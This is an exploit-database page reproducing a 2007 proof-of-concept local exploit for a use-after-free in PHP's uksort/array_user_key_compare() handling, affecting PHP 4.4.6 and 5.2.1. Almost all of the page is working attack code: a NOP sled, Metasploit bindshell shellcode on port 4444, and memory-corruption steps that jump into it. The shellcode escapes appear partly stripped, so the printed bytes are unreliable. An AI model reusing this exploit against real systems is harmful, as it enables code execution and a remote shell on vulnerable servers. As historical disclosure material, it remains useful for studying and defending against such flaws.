[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
# Published : 2007-03-16
# Author : Stefan Esser
# Previous Title : PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit
# Next Title : PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //
// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4/5 - array_user_key_compare() ZVAL dtor exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// You can put in any shellcode you want. Just make sure that the
// shellcode string starts with enough NOP space
// NOPSPACE
$shellcode = str_repeat(chr(0x90), 710);
// A bindshell on port 4444 generated by Metsploit
$shellcode .= "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65";
$arr = array(str_repeat("A", 39) => 1, "B" => 1);
function array_compare(&$key1, &$key2)
{
$GLOBALS['a'] = &$key2;
unset($key2);
return 1;
}
uksort($arr, "array_compare");
$x=array($shellcode => 1);
$a[8*4+0] = $a[6*4+0];
$a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian
$a[8*4+2] = $a[6*4+2];
$a[8*4+3] = $a[6*4+3];
unset($x);
?>
# www.Syue.com [2007-03-16]